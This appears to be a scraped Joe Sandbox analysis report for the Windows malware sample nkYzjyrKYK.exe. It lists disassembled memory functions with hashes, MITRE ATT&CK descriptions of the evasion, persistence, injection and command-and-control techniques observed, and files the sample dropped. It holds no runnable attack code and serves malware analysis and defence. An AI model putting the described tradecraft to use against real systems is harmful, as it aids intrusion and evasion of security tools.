Source File: 00000022.00000002.2676513982.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd34790000_powershell.jbxd

Similarity

API ID:
String ID: L_^$L_^$L_^$L_^
API String ID: 0-2357752022
Opcode ID: 79fe7442d78f8b9583203cea3df3719cb0fb9666a3449b9315a35a11a8de359d
Instruction ID: 3e4ee2d86c5c8b1549834ac3e482cdfb78ab93553736b8deffec20fe24982426
Opcode Fuzzy Hash: 79fe7442d78f8b9583203cea3df3719cb0fb9666a3449b9315a35a11a8de359d
Instruction Fuzzy Hash: D561A997E1DAC29BE392462D58B60D93BD4EF53354B0E14F6C389CB093ED1D3C469292

Analysis Process: powershell.exePID: 2432, Parent PID: 3880COMMON

Executed Functions

Function 00007FFD3476A0FB Relevance: .3, Instructions: 253COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2879454694.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd34760000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fa4bcdfcdaa32d88a8b3fc73d6cfa5fdf8a4e873201b9b43ceb6b02d33e3af5
Instruction ID: 5ff368594e6dd8a9e75f28d35de303fb453d677edb44c82e01dc7ecc911ce0cc
Opcode Fuzzy Hash: 9fa4bcdfcdaa32d88a8b3fc73d6cfa5fdf8a4e873201b9b43ceb6b02d33e3af5
Instruction Fuzzy Hash: 2B111F66A0E7C58FD7579B3898750947FB0DF63211B0A00EBD588CB0A3D91D5C4CDBA2

Function 00007FFD34834073 Relevance: .2, Instructions: 181COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2880698576.00007FFD34830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd34830000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cc7ad59a8a25f508a7b0adbae17983fdb556c0af98a24c10e6b83f3353df689
Instruction ID: 8b65cff9dd58b8cca12306c629e0b6c6157f6a83ca73e88de04e48b117204aa1
Opcode Fuzzy Hash: 1cc7ad59a8a25f508a7b0adbae17983fdb556c0af98a24c10e6b83f3353df689
Instruction Fuzzy Hash: E1512826B0DE5A4FE7D99B1C54B157877D2EF96620B1800BAC25EC73A3DD19EC058341

Function 00007FFD3464EB80 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2878218930.00007FFD3464D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3464D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd3464d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f60fb674681998dda963da4fda4ca962e2dba6492b1431267f1238b9885bd39b
Instruction ID: 933f19aab99458a7e1fd62710f34dfc403d3835a6c055d5b8e8c0583c4113a33
Opcode Fuzzy Hash: f60fb674681998dda963da4fda4ca962e2dba6492b1431267f1238b9885bd39b
Instruction Fuzzy Hash: 3E413A7150DBC44FDB568B28D891A923FF0EF53324B1505EFD089CB2A3D629A806C792

Function 00007FFD34769798 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2879454694.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd34760000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5493c388d14889df8d1865aa2aa1cfb4efee5ea9d5ecacd9d2a1c97b3655017
Instruction ID: 537a6e78d7d82d267547fcd3f57f04dabb447cc3cfeff87ce2c7ed15541907c6
Opcode Fuzzy Hash: b5493c388d14889df8d1865aa2aa1cfb4efee5ea9d5ecacd9d2a1c97b3655017
Instruction Fuzzy Hash: 9331F67091CF488FDB589B4CA8066A9BBE1FB99321F00422FE449D3242CB34A8518BC2

Function 00007FFD3476A64C Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2879454694.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd34760000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2e870d6e61d4d71760e957b5a96166d3f9c8acdbb26a34bc13c382bc7c49d0c
Instruction ID: be8bfd175595e2a1b03c5724891b7e9567fa7d2374c968e854d36f21db1046cd
Opcode Fuzzy Hash: b2e870d6e61d4d71760e957b5a96166d3f9c8acdbb26a34bc13c382bc7c49d0c
Instruction Fuzzy Hash: 4D21F87090CB4C4FEB59DFAC984A7E97FE0EB97321F04416BD049C3152DA74A85ACB92

Function 00007FFD348340BF Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2880698576.00007FFD34830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd34830000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c44202cf6c5ad40ef244c7a2868bab16b52c356c09b1a27dde7fea167cd4c27
Instruction ID: 23b58e4f0cb1175eda2338a1e9012c3e67f8dbea0ff0644c7df5f552c644cad8
Opcode Fuzzy Hash: 9c44202cf6c5ad40ef244c7a2868bab16b52c356c09b1a27dde7fea167cd4c27
Instruction Fuzzy Hash: 3D21A02BB1DE9B4FE7A59B1894B117876D2EF66610B4900BAD25EC73A3CD1CEC049341

Function 00007FFD347633B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2879454694.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd34760000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
Instruction ID: 9673819b57db3391d7149ca44187bfcecfbd052572aa48069badb64473713da4
Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
Instruction Fuzzy Hash: 7C01677121CB0C8FD744EF0CE451AA5B7E0FB95364F10056DE58AC3651DA36E882CB45

Function 00007FFD348343FA Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2880698576.00007FFD34830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd34830000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d98e430bae7b02dfb7ce692ab831b0eb99da46c11b6ad89951b981810a7a2f18
Instruction ID: d41d24e5437de98309f03a42fe0268cebc2c606e74ebd7d62971661ac27d7f02
Opcode Fuzzy Hash: d98e430bae7b02dfb7ce692ab831b0eb99da46c11b6ad89951b981810a7a2f18
Instruction Fuzzy Hash: 57F0B43270D5448FDB54EB58E4A04A873F0FF4632470500B6E259C7263DA29EC50C780

Function 00007FFD34836861 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2880698576.00007FFD34830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd34830000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87fc7bdef46fbcc0c535d3e89e9480eaf35936a53dacd09687af4895635fdbb7
Instruction ID: 34250e5dc233e5da3f0ac6637b5036f46086812d16e845852a8821bc009dda35
Opcode Fuzzy Hash: 87fc7bdef46fbcc0c535d3e89e9480eaf35936a53dacd09687af4895635fdbb7
Instruction Fuzzy Hash: 13E06D32B0EA884FEB56EBAC54A51E8BBA1EB99221F1400BFE14DD2243D9295845C350

Non-executed Functions

Function 00007FFD347684D3 Relevance: 6.4, Strings: 5, Instructions: 116COMMON

Download Yara Rule

Strings

O_^, xrefs: 00007FFD34768522
O_^, xrefs: 00007FFD34768572
O_^, xrefs: 00007FFD34768502
O_^, xrefs: 00007FFD34768562
O_^, xrefs: 00007FFD347685C2

Memory Dump Source

Source File: 00000023.00000002.2879454694.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd34760000_powershell.jbxd

Similarity

API ID:
String ID: O_^$O_^$O_^$O_^$O_^
API String ID: 0-2660881393
Opcode ID: ed2a84614118f83d1d2b39283f9bcf0e36a1cf3b6c643cd35388eb75f2ae236b
Instruction ID: 8fd9410534463f58d863b6439a8843294237e249bffa4ef6d7debc20c2c56182
Opcode Fuzzy Hash: ed2a84614118f83d1d2b39283f9bcf0e36a1cf3b6c643cd35388eb75f2ae236b
Instruction Fuzzy Hash: 3D315E96B0FAD69FE763463858B60943FD59E5323430F01E6C6D8DF1A3EE0C2847A252

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report nkYzjyrKYK.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Initial Sample

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\D3B0.tmp\D3B1.tmp\D3B2.bat

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_32fd1pz3.214.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3gemlrvy.1ht.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3mbtzgvy.akr.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fbxfj31w.1cy.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ge4dqpd4.ypt.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hocpckf1.10e.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ij54nvqx.1lt.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ivrxe33c.5st.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jx1jspt3.xpk.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kfrfd5kx.ejy.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lu1xgy5f.pe0.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mqnvy0z4.p4a.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n2jpeh1v.n44.ps1

Windows Analysis Report
nkYzjyrKYK.exe

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre